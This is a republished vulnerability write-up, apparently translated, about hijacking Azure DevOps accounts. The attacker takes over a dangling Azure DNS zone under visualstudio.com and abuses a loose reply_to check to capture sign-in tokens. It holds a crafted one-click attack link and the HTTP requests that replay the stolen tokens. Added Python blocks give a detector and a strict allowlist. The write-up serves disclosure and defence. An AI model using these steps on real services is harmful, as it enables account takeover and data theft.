
How to hijack Azure DevOps account through domain name hijacking

2025-03-26 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article describes how an Azure DevOps account can be hijacked through domain name hijacking (subdomain takeover). The write-up is detailed; readers interested in the topic can use it as a reference, and I hope it is helpful.

When testing for subdomain takeover vulnerabilities, you usually need to understand what can actually be done with a hijacked domain name and how much harm and impact it really has. Recently, the author took over the Microsoft developer subdomain project-cascade.visualstudio.com and used it to hijack Azure DevOps accounts. Let's take a look.

Domain name hijacking

Through automated testing, we found a subdomain of *.visualstudio.com, project-cascade.visualstudio.com, whose NS records point to Azure DNS, but a lookup against each of those nameservers is rejected (Refused):

dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns3-05.azure-dns.org status: [Refused]

dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns2-05.azure-dns.net status: [Refused]

dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns1-05.azure-dns.com status: [Refused]

dns-takeover lookup project-cascade.visualstudio.com. on nameserver ns4-05.azure-dns.info status: [Refused]

The Refused status above shows that project-cascade.visualstudio.com was once delegated to Azure DNS, but the corresponding zone no longer exists there: the delegation is dangling. That means we can create (take over) this zone with our existing Azure account and then publish any DNS record under it. The state of project-cascade.visualstudio.com after we registered it is as follows:
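A defender-side check for the condition just described, added here as an example and not part of the original write-up: it reads dig-style responses from each delegated nameserver and flags the delegation as claimable when every Azure DNS server answers REFUSED. The sample dig headers and the function names are constructed for this example.

```python
import re

# Azure DNS nameserver suffixes. A zone delegated to these servers but not
# provisioned in any Azure subscription answers REFUSED, and any Azure
# account can then create the zone and publish records under it.
AZURE_DNS_SUFFIXES = (".azure-dns.com", ".azure-dns.net",
                      ".azure-dns.org", ".azure-dns.info")


def rcode_from_dig(output: str) -> str:
    """Extract the RCODE (NOERROR, NXDOMAIN, REFUSED, ...) from dig's header line."""
    m = re.search(r"status:\s*([A-Z]+)", output)
    return m.group(1) if m else "NORESPONSE"


def classify_delegation(ns_hosts, answers):
    """
    ns_hosts: NS records the parent zone publishes for the subdomain.
    answers:  dict nameserver -> raw dig output from querying that server directly.
    Returns (verdict, per-server rcodes). 'DANGLING-CLAIMABLE' means every
    delegated server refused the zone and all of them belong to Azure DNS.
    """
    rcodes = {ns: rcode_from_dig(answers.get(ns, "")) for ns in ns_hosts}
    on_azure = all(ns.rstrip(".").endswith(AZURE_DNS_SUFFIXES) for ns in ns_hosts)
    if all(r == "REFUSED" for r in rcodes.values()):
        verdict = "DANGLING-CLAIMABLE" if on_azure else "DANGLING"
    elif any(r == "REFUSED" for r in rcodes.values()):
        verdict = "PARTIAL"  # inconsistent delegation: investigate before concluding
    else:
        verdict = "SERVED"
    return verdict, rcodes


# Constructed sample dig header lines (not captured from a live server).
REFUSED_HDR = ";; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 4242"
NOERROR_HDR = ";; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4243"

# The four nameservers shown in the write-up.
NS_SET = ["ns1-05.azure-dns.com.", "ns2-05.azure-dns.net.",
          "ns3-05.azure-dns.org.", "ns4-05.azure-dns.info."]

if __name__ == "__main__":
    verdict, codes = classify_delegation(NS_SET, {ns: REFUSED_HDR for ns in NS_SET})
    print(verdict, codes)
```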

Then we add two records to the zone:

TXT record: txt.project-cascade.visualstudio.com (containing the text "Azure DNS Zone Takeover POC" as a proof-of-concept marker)

A record: arec.project-cascade.visualstudio.com (pointing to an IP address we control, 3.88.203.203)

Use the dig command to query and verify:

$ dig txt txt.project-cascade.visualstudio.com @1.1.1.1
...omitted for brevity...
;; ANSWER SECTION:
txt.project-cascade.visualstudio.com. 10 IN TXT "Azure DNS Zone Takeover POC"

$ dig a arec.project-cascade.visualstudio.com @1.1.1.1
...omitted for brevity...
;; ANSWER SECTION:
arec.project-cascade.visualstudio.com. 2475 IN A 3.88.203.203

In-depth testing

With that, we have taken over the project-cascade.visualstudio.com subdomain, so let's look at the concrete harm it can cause.

We noticed that some subdomains under visualstudio.com perform authentication through login.microsoftonline.com. For example, visiting app.vssps.visualstudio.com triggers the following redirect towards login.microsoftonline.com:

https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90#ctx=eyJTaWduSW5Db29raWVEb21haW5zIjpbImh0dHBzOi8vbG9naW4ubWljcm8zb2Z0b25saW5lLmNvbSJdfQ2

which then redirects to https://login.microsoftonline.com/...omitted... for authentication.

The two most important parts of this redirect-based sign-in flow are:

the sign-in endpoint https://app.vssps.visualstudio.com/_signin, and

the parameter reply_to=https%3A%2F%2Fapp.vsaex.visualstudio.com%2F, which names the host that receives the token.

After testing, we found that the domain restriction in this sign-in flow is loose: any *.visualstudio.com subdomain is allowed to receive the identity token. To verify this, we constructed the following test URL:

https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90

In this link, we change the original reply_to value to the subdomain we control, https%3A%2F%2Farec.project-cascade.visualstudio.com%2F. Visiting the link still takes you to the normal Microsoft live.com login page. If the user is already logged in, the redirect is carried out immediately:

If the victim visits the link and signs in, the redirect issues a POST request to our controlled domain arec.project-cascade.visualstudio.com, as follows:

POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1
Host: arec.vssps.visualstudio.com
Cookie: ...omitted for brevity...

id_token=&FedAuth=&FedAuth2=%2B

The backend of arec.project-cascade.visualstudio.com, which we control, then automatically issues a POST towards app.vsaex.visualstudio.com and receives a second identity token message for the victim's session with app.vsaex.visualstudio.com, as shown below:

POST /_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F HTTP/1.1
Host: arec.project-cascade.visualstudio.com
Content-Length: 4634
Referer: https://arec.vssps.visualstudio.com/_signedin?realm=arec.project-cascade.visualstudio.com&protocol=&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F
Cookie: ...omitted for brevity...

id_token=&FedAuth=&FedAuth2=

Vulnerability exploitation

With the identity token obtained above, we can authenticate to vsaex.visualstudio.com, dev.azure.com, vssps.dev.azure.com and other legitimate domains, establish a valid login, and take over the victim's identity on those services. Taking an app.vsaex.visualstudio.com account as an example, we send an authentication request carrying the stolen token:

POST /_apis/WebPlatformAuth/SessionToken HTTP/1.1
Host: app.vsaex.visualstudio.com
Connection: close
Content-Length: 105
Origin: https://app.vsaex.visualstudio.com
X-VSS-ReauthenticationAction: Suppress
Content-Type: application/json
Accept: application/json;api-version=6.0-preview.1;excludeUrls=true
X-Requested-With: XMLHttpRequest
...omitted for brevity...
Cookie: UserAuthentication=; FedAuth=; FedAuth2=

{"appId": "00000000-0000-0000-0000-000000000000", "force": false, "tokenType": 0, "namedTokenId": "Aex.Profile"}

The server then responds with a valid session token issued by app.vsaex.visualstudio.com for the user:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 933
Content-Type: application/json; charset=utf-8; api-version=6.0-preview.1
...omitted for brevity...

{"appId": "00000000-0000-0000-0000-000000000000", "token": "", "tokenType": "session", "validTo": "2020-05-12T06:45:47.2007474Z", "namedTokenId": "Aex.Profile"}

With this token, the user's profile (including the mail address) can be fetched from app.vsaex.visualstudio.com. Request:

GET /_apis/User/User HTTP/1.1
Host: app.vsaex.visualstudio.com
Connection: close
X-TFS-FedAuthRedirect: Suppress
X-VSS-ReauthenticationAction: Suppress
X-Requested-With: XMLHttpRequest
Accept-Language: en-US
Authorization: Bearer 
Accept: application/json;api-version=6.0-preview.1;excludeUrls=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
X-TFS-Session: ab1e4b56-599c-4ab6-9f5e-756c486a0f2b
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://app.vsaex.visualstudio.com/me?mkt=en-US
Accept-Encoding: gzip, deflate

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 258
...omitted for brevity...

{"descriptor": "msa.NTg0Zjc4NDAtYzc5ZC03MWU0LWJkN2ItMDZhY2Y1N2Q2OTA1", "displayName": "s", "mail": "", "unconfirmedMail": null, "country": "AU", "dateCreated": "2018-05-25T23:19:53.6843383+00:00", "lastModified": "2019-01-06T15:43:50.2963651+00:00", "revision": 0}

With the stolen token, the development projects associated with dev.azure.com can also be reached through https://app.vsaex.visualstudio.com/me?mkt=en-US:

And finally the project resources the user hosts on dev.azure.com can be accessed. Request:

GET /seanyeoh/_usersSettings/keys?__rt=fps&__ver=2 HTTP/1.1
Host: dev.azure.com
Connection: close
x-tfs-fedauthredirect: Suppress
Origin: https://dev.azure.com
x-vss-reauthenticationaction: Suppress
authorization: Bearer 
accept: application/json;api-version=5.0-preview.1;excludeUrls=true;enumsAsNumbers=true;msDateFormat=true;noArrayWrap=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Harm and impact

A malicious attacker could send the following link to an unsuspecting victim and hijack the victim's account with a single click:

https://app.vssps.visualstudio.com/_signin?realm=app.vsaex.visualstudio.com&reply_to=https%3A%2F%2Farec.project-cascade.visualstudio.com%2F&redirect=1&context=eyJodCI6MywiaGlkIjoiNDA0ODFkZDAtZDUzMS1hMWE2LWQ0MzYtMDQxNTk3MWI0MmQ2IiwicXMiOnt9LCJyciI6IiIsInZoIjoiIiwiY3YiOiIiLCJjcyI6IiJ90

Once the attacker holds the app.vsaex.visualstudio.com access token, the victim's Azure DevOps account is completely hijacked.

In addition, with control of project-cascade.visualstudio.com, MX records could be set up to receive mail for *.project-cascade.visualstudio.com, and SSL certificates could be issued for the name to impersonate Microsoft services.

Vulnerability fix

Re-register the project-cascade.visualstudio.com zone so that Microsoft regains control of it.

Restrict the reply_to destinations for which app.vssps.visualstudio.com will issue a token to the domain app.vsaex.visualstudio.com.
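The second fix, as an added example that is not Microsoft's code: the loose suffix check the article describes beside an exact-host allowlist, applied to the reply_to values from the article. The function names and ALLOWED_REPLY_HOSTS are assumptions made for this example.

```python
from urllib.parse import urlparse, unquote

# Exact hosts permitted to receive the sign-in token. Assumption for this example:
# only the app.vsaex.visualstudio.com realm named in the fix.
ALLOWED_REPLY_HOSTS = {"app.vsaex.visualstudio.com"}


def weak_reply_to_ok(reply_to: str) -> bool:
    """The loose check the article describes: any *.visualstudio.com host passes,
    including a subdomain whose DNS zone has been taken over."""
    host = urlparse(unquote(reply_to)).hostname or ""
    return host.endswith(".visualstudio.com")


def strict_reply_to_ok(reply_to: str) -> bool:
    """Hardened check: https only, exact-host allowlist, and no userinfo, port
    or fragment that could make the URL look like an allowed host."""
    url = urlparse(unquote(reply_to))
    try:
        port = url.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if url.scheme != "https" or url.username is not None or port is not None:
        return False
    if url.fragment:
        return False
    return (url.hostname or "").lower() in ALLOWED_REPLY_HOSTS


# reply_to values from the article (URL-encoded as they appear in the sign-in link).
LEGIT = "https%3A%2F%2Fapp.vsaex.visualstudio.com%2F"
TAKEOVER = "https%3A%2F%2Farec.project-cascade.visualstudio.com%2F"
# Constructed look-alike: the allowed name sits in the userinfo part, the real host differs.
LOOKALIKE = "https%3A%2F%2Fapp.vsaex.visualstudio.com%40evil.example%2F"

if __name__ == "__main__":
    for name, value in [("legit", LEGIT), ("takeover", TAKEOVER), ("lookalike", LOOKALIKE)]:
        print(f"{name:10} weak={weak_reply_to_ok(value)} strict={strict_reply_to_ok(value)}")
```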

That is how an Azure DevOps account can be hijacked through domain name hijacking. I hope the above content was of some help and that you learned something from it. If you found the article useful, please share it so more people can see it.
